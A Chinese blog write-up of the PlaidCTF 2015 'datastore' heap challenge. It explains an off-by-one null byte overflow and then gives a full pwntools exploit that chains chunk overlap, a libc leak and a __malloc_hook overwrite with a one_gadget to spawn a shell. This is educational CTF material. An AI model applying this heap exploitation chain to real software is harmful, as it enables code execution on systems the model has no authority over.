2015 plaidctf datastore(off by one)

最新推荐文章于 2024-05-16 07:43:58 发布
最新推荐文章于 2024-05-16 07:43:58 发布
阅读量654 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/98438303
版权

1、检查

[*] '/home/yzl/Documents/off_by_one/datastore'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

保护全开

2、漏洞分析

在这里插入图片描述
v3先赋值,再+1,所以当row_key刚好到了临界区,刚好还没有扩大时,会有一个NULL 字节溢出。key_row会产生溢出的几个大小0x18,0x38,0x78,0xf8,0x1f8…

3、漏洞利用

在这里插入图片描述
当free b后,会通过unlink会将x+fast+a+b合并成一个大的unsort bin,而我们再将fast free后,再次申请chunk,便可以控制fast 的fd域,这就变成了uaf,从而实现任意写。
exp

from pwn import *
import LibcSearcher as ls 
context.log_level = 'debug'

context.terminal = ['gnome-terminal', '-x', 'sh', '-c']


p = process('./datastore')

libc= ELF("/lib/x86_64-linux-gnu/libc.so.6")

def GET(row_key):
    p.recvuntil('PROMPT: Enter command:\n')
    p.sendline("GET")
    p.sendlineafter('PROMPT: Enter row key:\n',row_key)
def PUT(row_key,size,data):
    p.recvuntil('PROMPT: Enter command:\n')
    p.sendline("PUT")
    p.sendlineafter('PROMPT: Enter row key:\n',row_key)
    p.sendlineafter('PROMPT: Enter data size:\n', str(size))
    if(len(data)<size):
        data=data.ljust(size,'\x00')
    p.sendafter('PROMPT: Enter data:\n',data)


def DUMP():
    p.recvuntil('PROMPT: Enter command:\n')
    p.sendline("DUMP")

def DEL(row_key):
    p.recvuntil('PROMPT: Enter command:\n')
    p.sendline("DEL")
    p.sendlineafter("PROMPT: Enter row key:\n",row_key)

def EXIT():
    p.recvuntil('PROMPT: Enter command:\n')
    p.sendline("EXIT")




for i in range(10):#因为每个功能函数都用到了0x38 chunk,所以我们先构造一些,避免影响后面的利用
    PUT(str(i), 0x38, 'a' * 0x18)
for i in range(10):
    DEL(str(i))


PUT('x', 0x200, 'x' * 0x200)
PUT('fast', 0x68, 'fast')
PUT('fast2', 0x68, 'fast2')
PUT('a', 0x1f8, 'a' * 0x18)
PUT('b', 0xf0, 'b' * 0x18)
PUT('defense', 0x400, 'defense-data')#防止top bin的影响
DEL('a')
DEL('x')
DEL('1' * 0x1f0 + p64(0x4f0))#对b的pre_size域和prev_inuse进行覆盖
DEL('b')
PUT('0x200', 0x200, '0x200')
PUT('0x200plus',0x200,'0x200')
GET('fast')
p.recvuntil(']:\n')
leak = u64(p.recv(8).ljust(8, '\x00'))
libc_base= leak-(0x7ffff7dd1b78-0x7ffff7a0d000)
DEL('fast2')
PUT('0x68+0x68', 0x100, 'a' * 0x68 + p64(0x71) + p64(libc_base + libc.symbols['__malloc_hook'] - 10-0x10+7))
PUT('pre', 0x68, 'aa')
one_gadget_offset =  0x4526a
one_gadget=one_gadget_offset+libc_base
PUT('attack',0x68,'a'*3+p64(one_gadget))
GET('fast')
p.interactive()

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/off_by_one-zh/#2-plaidctf-2015-plaiddb
https://bbs.pediy.com/thread-246966.htm

Maxmalloc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
off-null-byte-plaiddb
csdn546229768的博客
01-18 451
题目: plaidctf2015_plaiddb ->datastore 分析 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UTd2LGgx-1642508657858)(posion-null-byte(plaidctf2015_plaiddb)].assets/image-20220118010052651.png) 这题不用纠结这个二叉树算法,解题思路和算法方面关系不大 put函数:(用于添加键值对) [外
PlaidCTF CTF 2015 pwn160
Vccxx的博客
04-14 807
PlaidCTF CTF 2015 pwn160格式化字符串漏洞之前指针没有理解好,所以理解这题的攻击花了不少功夫,记录一下思路:程序中的sprintf第三个参数format由我们控制,存在明显的格式化字符串漏洞。这个程序给了一个全局buf,大小为1024字节,可以植入shellcode,主要的难点是如何将某个函数的返回地址(脚本中写的是make_response返回地址)改成buf中的地址。这里用
2024年安卓最新JetPack下DataStore学习(1),2024年最新0基础学android开发
最新发布
2401_84545088的博客
05-16 946
现在都说互联网寒冬,其实无非就是你上错了车,且穿的少(技能),要是你上对车,自身技术能力够强,公司换掉的代价大,怎么可能会被裁掉,都是淘汰末端的业务Curd而已!一共十个专题,包括了Android进阶所有学习资料,Android进阶视频,Flutter,java基础,kotlin,NDK模块,计算机网络,数据结构与算法,微信小程序,面试题解析,framework源码!键值对数据,适合存储简单、小型的数据,并且不支持局部更新,如果修改了其中一个值,整个文件内容将会被重新序列化,
DataStore的基础用法
成长的烧年
12-18 6995
0. 简介 Google在推出JetPack组件以来,一直推荐我们使用DataStore组件替代到我们第一天学android就知道的SharedPreferences组件,原因很简单,因为当年的SharedPreferences存在居多的问题,DataStore就是为了解决这些问题而来的。 1. SP的缺点 至于 SP到底存在哪些问题,我们可以直接查看 DataStore源码上的注释: Synchronous API encourages StrictMode violations apply() an
DataStore详解
听海的博客
05-25 3418
项目中使用SharedPreference时还是要注意。不能用来替代SharedPreference。整个对象都将被序列化并持久化到磁盘。一致的事务方式存储数据。事务方式处理更新数据。
Android DataStore 使用详解
赵彦军
10-19 6831
Jetpack DataStore 是一种数据存储解决方案,允许您使用协议缓冲区存储键值对或类型化对象。DataStore 使用 Kotlin 协程和 Flow 以异步、一致的事务方式存储数据。
Android DataStore使用和封装
03-18
在Android开发中,数据存储是不可或缺的一部分,DataStore是Google推出的一种新型持久化存储解决方案,旨在替代SharedPreferences。本文将深入探讨Android DataStore的使用方法及其封装技巧,旨在帮助开发者更好地...
powerbulilder pb datastore实现步骤完整源码.docx
08-02
在PowerBuilder(PB)开发中,DataStore是一个重要的对象,用于存储和操作数据库中的数据。在本示例中,我们详细探讨如何创建、查询、取值以及释放DataStore。 1. **创建DataStore**: 创建一个名为`ds_sale`的...
DataStore:具有 TTL 功能的混合 KV 存储和缓存
05-30
DataStore 是混合键值存储和内存缓存。 它将数据作为键值对存储在文件中。 但是,它还维护一个 LRU 缓存以进行快速数据检索。 它还具有 TTL(生存时间)功能,使用该功能可以使数据具有过期时间。 数据将在某些否后...
android-datastore
04-01
数据存储代码实验室 代码和代码支持代码。 DataStore是一种新的经过改进的数据存储...Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file di
nodejs-datastore:Google Cloud Datastore的Node.js客户端:适用于您的Web和移动应用程序的高度可扩展的NoSQL数据库
02-03
适用于Node.js的Cloud Datastore客户端库可以在找到每个版本中更改的全面列表。 在“客户端库介绍”中详细了解有关Cloud API的客户端库,包括较旧的Google API客户。 目录:快速开始在你开始之前。 。 以便您可以从...
pCTF2015:plaidCTF 2015 的回购
06-11
pCTF2015 plaidCTF 2015 测试 git 的回购
Android DataStore:安全存储和轻松管理数据
2201_75362610的博客
01-11 869
关于作者:CSDN内容合伙人、技术专家, 从零开始做日活千万级APP。专注于分享各领域原创系列文章 ,擅长java后端、移动开发、人工智能等,希望大家多多支持。
【Android Jetpack】DataStore的介绍
xoliu的博客
11-19 611
Jetpack DataStore是一种数据存储解决方案,允许您使用协议缓冲区存储键值对或类型化对象。DataStore使用Kotlin协程和Flow以异步、一致的事务方式存储数据。
Android Jetpack组件 DataStore的使用和简单封装,安卓面试
2401_84148955的博客
04-06 808
下面我们再写一个取数据的方法。: “新冠” }.first()你会发现和存数据又有不同,这里的first()就是取值,这个方法换个方式来看就清晰一些。然后我们在取数据按钮的点击事件中调用。下面我们运行一下:第一次我先取数据,显示的是默认值,然后我存数据再取数据。效果就是这样,但你会觉得使用起来很麻烦,不如SP好用,这个我们后面再去封装,先了解一些它的功能特性。三、数据查看和清除在进行定义dataStore时,会在手机中生成一个pb文件,这里我们用虚拟机来看,然后通过你的程序包名去找。
DataStore入门及在项目中的使用
qq_26014653的博客
05-17 940
新手踩坑DataStore,及在项目中的运用,需要了解kotlin的扩展和属性委托,才能看懂官网的代码
【Jectpack】DataStore
健忘的鱼的博客
12-05 2663
dataStore 是jectpack推出的轻量化存储组件,包含PreferenceDataStore和ProtoDataStore两种方式,基于Flow()实现数据存储 Why To Use 之前的Android轻量化存储组件SharedPreferences读写操作会阻塞主线程,在数据量不多的情况下没什么影响,但随着对组件的滥用,存储的数据量逐渐增大,性能问题逐渐显现,官方也挣扎着出了apply()异步化方案,希望挽救SharedPreferences于水火,但可惜apply()并未实现真正意义上的.
Android Jetpack 组件之DataStore的使用
Android/Kotlin/Ktor/Compose
10-23 863
只需对数据结构化的方式进行一次定义,编译器便会生成源代码,轻松写入和读取结构化数据。我们是配置依赖项的中声明了proto源码地址路径在,在src/main/下新建一个probo包,在其包下新建我们的probo文件:data.proto 的内容如下:如果需要高亮显示 proto 代码,下载 proto 插件/**完成 Gradle 设置后,让我们开始创建包含必填字段的原型文件。在目录app/src/main/下创建一个 proto目录。新建一个名称为 data 扩展名为.proto的文件。
html datastore
07-28
HTML Datastore 是一种用于在浏览器中存储和检索数据的技术。它通过使用 Web Storage API 或 IndexedDB API 来实现。HTML Datastore 允许开发者在客户端存储数据,而不必依赖服务器端。 Web Storage API 是 HTML5 ...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值